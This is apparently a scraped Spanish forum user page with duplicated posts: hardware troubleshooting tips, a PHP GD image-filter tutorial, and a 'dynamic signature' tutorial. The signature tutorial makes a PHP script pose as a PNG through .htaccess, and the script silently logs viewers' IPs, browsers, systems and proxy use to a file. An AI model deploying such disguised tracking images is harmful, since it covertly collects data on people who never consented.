3.- No esta enviando correctamente la alimentacion (algo no funciona bien con la alimentacion o no da el voltaje correcto, cambiar fuente para comprobar, tambien comprobar el cable de alimentacion)
4.- BIOS o tarjeta madre defectuosa (Actualizar BIOS en caso de que no funcionara verificar o cambiar t.madre)
LAPTOP: Ver descripcion de arriba en casos similares al anterior
1.- Drivers o sistema
2.- Esta mal conectado o touchpad defectuoso (verificar el flexible en este caso)
3.- No esta enviando correctamente la alimentacion (En este caso probar con otro Cargador puede ser suficiente, Verificar conecto JACK con algun mutimetro, cambiar para verificar si es posible)
4.- BIOS o tarjeta madre defectuosa
Todos los casos anteriores son aplicados a modo prueba y error. Espero que les sea de utilidad, cada vez que tenga tiempo estare actualizando el post, saludos!
# Teclado o mouse no funcionan correctamente PC/LAPTOP #
##################################################
Les mostrare la lista de procesos para diagnosticar cuando un teclado o mouse en caso de la pc o de la laptop no funcionan correctamente:
PC:
1.- Drivers o sistema (verificar que los drivers existan y funcionen correctamente, bootear un sistema operativo como hirents boot para verificar que el sistema no de problemas)
2.- Esta mal conectado o mouse o teclado defectuoso (probar en diferentes conexiones o verificar que este bien conectado)
3.- No esta enviando correctamente la alimentacion (algo no funciona bien con la alimentacion o no da el voltaje correcto, cambiar fuente para comprobar, tambien comprobar el cable de alimentacion)
4.- BIOS o tarjeta madre defectuosa (Actualizar BIOS en caso de que no funcionara verificar o cambiar t.madre)
LAPTOP: Ver descripcion de arriba en casos similares al anterior
1.- Drivers o sistema
2.- Esta mal conectado o touchpad defectuoso (verificar el flexible en este caso)
3.- No esta enviando correctamente la alimentacion (En este caso probar con otro Cargador puede ser suficiente, Verificar conecto JACK con algun mutimetro, cambiar para verificar si es posible)
4.- BIOS o tarjeta madre defectuosa
Todos los casos anteriores son aplicados a modo prueba y error. Espero que les sea de utilidad, cada vez que tenga tiempo estare actualizando el post, saludos!
#138
Dudas y pedidos generales / Re:[AYUDA] Fuerza Bruta
Mayo 13, 2015, 07:32:07 PM #139
Back-end / [PHP]Filtros con la libreria GD
Mayo 07, 2015, 02:37:09 PM
Buenas en este caso utilizaremos la libreria PHP GD para aplicar algunos efectos comunes utilizando la funcion You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login:
Como se describe la sintaxis arriba, necesitamos un recurso de imagen, una constante que aplicara el filtro (varios incluyen opciones y otros no).
Vamos a explicar algunas de las opciones que podremos usar.
IMG_FILTER_NEGATE - Esto lo que hace es negar los colores de la imagen (invertirlos).
IMG_FILTER_GRAYSCALE - Convierte la imagen a escala de grises.
IMG_FILTER_GAUSSIAN_BLUR - Pone la imagen borrosa utilizando el metodo Gaussiano.
IMG_FILTER_EMBOSS - Pone en relieve la imagen.
IMG_FILTER_EDGEDETECT - Detecta los bordes de la imagen para resaltarlos.
IMG_FILTER_BRIGHTNESS - Cambia el brillo de la imagen. Tiene un argumento el cual puede ir del valor -255 a 255.
IMG_FILTER_COLORIZE - Le da un color a toda la imagen, se usan tres parametros RGB (rojo, verde y azul), tambien puedes usar un cuarto parametro para valores alpha que va desde 0 a 127 lo cual le da transparencia a la imagen.
IMG_FILTER_CONTRAST - Cambia el contraste de la imagen.
Tiene un argumento el cual puede ir del valor -255 a 255.
IMG_FILTER_SMOOTH - Suaviza la imagen. Los valores recomendados son de -8 a 8 para que la diferencia se note pero no exageradamente.
Ahora veremos dos ejemplos en practica:
Codigo:
Código: php
Imagen: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Filtro Aplicado: IMG_FILTER_NEGATE
Resultado:
Codigo:
Código: php
Imagen: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Filtro Aplicado: IMG_FILTER_COLORIZE
Resultado:
Y hasta aqui esta pequeña introduccion, es muy facil de usar, pero los efectos son bastante buenos, saludos!
Citarbool imagefilter ( resource $image , int $filtertype [, int $arg1 [, int $arg2 [, int $arg3 [, int $arg4 ]]]] )
Como se describe la sintaxis arriba, necesitamos un recurso de imagen, una constante que aplicara el filtro (varios incluyen opciones y otros no).
Vamos a explicar algunas de las opciones que podremos usar.
IMG_FILTER_NEGATE - Esto lo que hace es negar los colores de la imagen (invertirlos).
IMG_FILTER_GRAYSCALE - Convierte la imagen a escala de grises.
IMG_FILTER_GAUSSIAN_BLUR - Pone la imagen borrosa utilizando el metodo Gaussiano.
IMG_FILTER_EMBOSS - Pone en relieve la imagen.
IMG_FILTER_EDGEDETECT - Detecta los bordes de la imagen para resaltarlos.
IMG_FILTER_BRIGHTNESS - Cambia el brillo de la imagen. Tiene un argumento el cual puede ir del valor -255 a 255.
IMG_FILTER_COLORIZE - Le da un color a toda la imagen, se usan tres parametros RGB (rojo, verde y azul), tambien puedes usar un cuarto parametro para valores alpha que va desde 0 a 127 lo cual le da transparencia a la imagen.
IMG_FILTER_CONTRAST - Cambia el contraste de la imagen.
Tiene un argumento el cual puede ir del valor -255 a 255.
IMG_FILTER_SMOOTH - Suaviza la imagen. Los valores recomendados son de -8 a 8 para que la diferencia se note pero no exageradamente.
Ahora veremos dos ejemplos en practica:
Codigo:
$image = imagecreatefrompng("ay2bdLJ.png");
imagefilter($image, IMG_FILTER_NEGATE); // negar colores
header("content-type: image/png");
imagepng($image);
imagedestroy($image);Imagen: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Filtro Aplicado: IMG_FILTER_NEGATE
Resultado:
Codigo:
$image = imagecreatefrompng("space.png");
imagefilter($image, IMG_FILTER_COLORIZE,255,0,0); // le da color a la imagen, red green blue
header("content-type: image/png");
imagepng($image);
imagedestroy($image); Imagen: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Filtro Aplicado: IMG_FILTER_COLORIZE
Resultado:
Y hasta aqui esta pequeña introduccion, es muy facil de usar, pero los efectos son bastante buenos, saludos!
#140
Back-end / [PHP] Creando una firma dinamica
Mayo 05, 2015, 04:05:41 PMIntroduccion
Buenas he estado sin tiempo para postear pero en esta ocasion les mostraré como crear una firma dinamica de manera que obtengan algunos datos, muchos ya saben como realizarlo por que no tiene tanta dificultad mas que nada se trata de utilizar la libreria de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
Un buen tutorial que recomiendo mucho sobre PHP GD es el siguiente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login el cual esta muy bien explicado.
Tratare de ser breve colocando solo los pasos.
Estructura a realizar
La estructura con la que trabajaremos sera la siguiente:
Explicando un poco que hace cada archivo.
.htaccess - Con este archivo interpretaremos imagenes png (con su extension .png) como archivos php y bloquearemos cualquier intento de acceso al archivo logs.txt
firma.php - Con este archivo generamos la imagen dinamica (pronto le cambiaremos la extension a .png)
KeepCalm-Medium.ttf - Es el tipo de letra que utilizaremos para la firma dinamica.
logs.txt - Aqui guardaremos los logs, en este caso IP, Sistema, Si usa proxy.
rVJgsdx.png - Es la imagen que utilizaremos para la firma dinamica.
view_logs.php - Este es un archivo para ver los logs online. Con un simple formulario que tiene que ingresar una clave.
Nota importante: Nada de aqui es guardado en una base de datos. Y esto es facilmente explotable haciendo peticiones desde la misma IP un sin fin de veces cargaria todo el archivo logs.txt haciendolo demasiado pesado (Esa idea la hizo un amigo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) entonces lo unico que podemos realizar en este caso es:
1.- Denegar las ips que realizen demasiadas peticiones
2.- No insertar IPS repetidas en el archivo logs.txt
3.- Cambiar el nombre de la carpeta para que no hagan mas peticiones.
Cualquiera de estos tres puntos no se ven en este tutorial.
Creando la firma
En este caso crearemos el archivo PHP para realizar la firma dinamica, no entrare en detalles de explicaciones ya que comente el codigo lo mas posible para que se entendiera, de todas maneras si no entienden algo, arriba deje una buena documentacion con la que pueden guiarse.
Código: php
Asignar formato a la imagen y denegar acceso a los logs
En este apartado crearemos el archivo .htaccess el cual denegara acceso a los logs y interpretara nuestro archivo png como php.
Creando archivo para ver los logs
Por ultimo creamos nuestro archivo view_logs.php con el cual veremos los logs.
Código: php
En este caso solo hay que cambiar tucontraseñae.e por la contraseña que le quieras asignar a la entrada.
Finalizando
Le cambiamos la extension al archivo firma.php y le ponemos el nombre que queramos en mi caso firma.png
Lo abrimos en el navegador para ver los resultados.
En este caso mi ip es ::1 ya que es una ip local.
Les dejo por ultimo los archivos por si quieren probarlo, igual pueden realizar el suyo propio cambiando algunas funciones como dependiendo del tipo de imagen que sea JPEG, PNG, etc. el tipo de letra, sus datos, etc. De igual manera con esto podrian crearse hasta generadores de firmas, saludos!
Archivos: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas he estado sin tiempo para postear pero en esta ocasion les mostraré como crear una firma dinamica de manera que obtengan algunos datos, muchos ya saben como realizarlo por que no tiene tanta dificultad mas que nada se trata de utilizar la libreria de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.
Un buen tutorial que recomiendo mucho sobre PHP GD es el siguiente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login el cual esta muy bien explicado.
Tratare de ser breve colocando solo los pasos.
Estructura a realizar
La estructura con la que trabajaremos sera la siguiente:
Explicando un poco que hace cada archivo.
.htaccess - Con este archivo interpretaremos imagenes png (con su extension .png) como archivos php y bloquearemos cualquier intento de acceso al archivo logs.txt
firma.php - Con este archivo generamos la imagen dinamica (pronto le cambiaremos la extension a .png)
KeepCalm-Medium.ttf - Es el tipo de letra que utilizaremos para la firma dinamica.
logs.txt - Aqui guardaremos los logs, en este caso IP, Sistema, Si usa proxy.
rVJgsdx.png - Es la imagen que utilizaremos para la firma dinamica.
view_logs.php - Este es un archivo para ver los logs online. Con un simple formulario que tiene que ingresar una clave.
Nota importante: Nada de aqui es guardado en una base de datos. Y esto es facilmente explotable haciendo peticiones desde la misma IP un sin fin de veces cargaria todo el archivo logs.txt haciendolo demasiado pesado (Esa idea la hizo un amigo You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) entonces lo unico que podemos realizar en este caso es:
1.- Denegar las ips que realizen demasiadas peticiones
2.- No insertar IPS repetidas en el archivo logs.txt
3.- Cambiar el nombre de la carpeta para que no hagan mas peticiones.
Cualquiera de estos tres puntos no se ven en este tutorial.
Creando la firma
En este caso crearemos el archivo PHP para realizar la firma dinamica, no entrare en detalles de explicaciones ya que comente el codigo lo mas posible para que se entendiera, de todas maneras si no entienden algo, arriba deje una buena documentacion con la que pueden guiarse.
<?php
// no reportamos errores
error_reporting(0);
// el nombre de la imagen a poner como firma
$im_name = "rVJgsdx.png";
// los datos de la imagen
$data_im = getimagesize($im_name);
// el tipo de imagen
header("Content-type: {$data_im['mime']}");
// creamos la imagen en este caso png
$im = imagecreatefrompng($im_name);
// creamos un color para usarlo en el texto
$color = imagecolorallocate($im, 45, 196, 236);
// obtenemos la IP
$ip = $_SERVER['REMOTE_ADDR'];
// obtenemos los datos del navegador
$user_agent = $_SERVER['HTTP_USER_AGENT'];
// vemos si existe algun proxy (no es 100% fiable), y lo agregamos a la variable ip
$proxy_headers = array(
'HTTP_VIA',
'HTTP_X_FORWARDED_FOR',
'HTTP_FORWARDED_FOR',
'HTTP_X_FORWARDED',
'HTTP_FORWARDED',
'HTTP_CLIENT_IP',
'HTTP_FORWARDED_FOR_IP',
'VIA',
'X_FORWARDED_FOR',
'FORWARDED_FOR',
'X_FORWARDED',
'FORWARDED',
'CLIENT_IP',
'FORWARDED_FOR_IP',
'HTTP_PROXY_CONNECTION'
);
foreach($proxy_headers as $x){
if (isset($_SERVER[$x])) {
$ip .= "/Estas usando proxy!";
break;
}
}
// reemplazamos los datos del navegador en caso de que sea firefox por firefox o chrome por chrome, la lista es corta se pueden agregar mas
$navegador = preg_replace('/.*(firefox|chrome).*/i', '$1', $user_agent);
// lo mismo que arriba en este caso con el sistema, igual podemos hacer la lista personalizable
$sistema = preg_replace('/.*(windows|mac|linux).*/i', '$1', $user_agent);
// guardamos los datos en una variable para usarla en el texto
$string = " Tu IP: $ip \n Tu navegador: $navegador \n Tu sistema: $sistema \n Te estoy vigilando!\n";
// asignamos una variable con la fuente para usarla en el texto
$fuente = "KeepCalm-Medium.ttf";
// en caso de que no se haya detectado nada mostramos el navegador, aunque nos trolleen xD :P
if($navegador == ''){
$navegador = $_SERVER['HTTP_USER_AGENT'];
}
// what? :3, Guardamos logs
$manejador = fopen("logs.txt", 'a+');
fwrite($manejador, "$string\n\n\n");
fclose($manejador);
// magia is here! Mostramos el texto en las coordenadas dadas
imagettftext($im, 10, 0, 300, 10, $color, $fuente, $string);
// png transparency, para la transparencia en la imagen sino se veria desfigurada
imagealphablending($im, true);
imagesavealpha($im, true);
imagepng($im);
// destroy image, liberamos la memoria
imagedestroy($im);
?>
Asignar formato a la imagen y denegar acceso a los logs
En este apartado crearemos el archivo .htaccess el cual denegara acceso a los logs y interpretara nuestro archivo png como php.
CitarAddType application/x-httpd-php .png
<FilesMatch "\.(txt)$">
Order Deny,Allow
Deny from all
</FilesMatch>
Creando archivo para ver los logs
Por ultimo creamos nuestro archivo view_logs.php con el cual veremos los logs.
<?php
if (isset($_POST['pass']) && !empty($_POST['pass']) && $_POST['pass'] == 'tucontraseñae.e') {
$gestor = fopen('logs.txt', 'r');
$contenido = fread($gestor, filesize('logs.txt'));
fclose($gestor);
echo "<pre>" . $contenido . "</pre>";
}
?>
<form method="post" action="">
<p><input type="text" name="pass" /></p>
<p><input type="submit" name="enviar" /></p>
</form>
En este caso solo hay que cambiar tucontraseñae.e por la contraseña que le quieras asignar a la entrada.
Finalizando
Le cambiamos la extension al archivo firma.php y le ponemos el nombre que queramos en mi caso firma.png
Lo abrimos en el navegador para ver los resultados.
En este caso mi ip es ::1 ya que es una ip local.
Les dejo por ultimo los archivos por si quieren probarlo, igual pueden realizar el suyo propio cambiando algunas funciones como dependiendo del tipo de imagen que sea JPEG, PNG, etc. el tipo de letra, sus datos, etc. De igual manera con esto podrian crearse hasta generadores de firmas, saludos!
Archivos: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
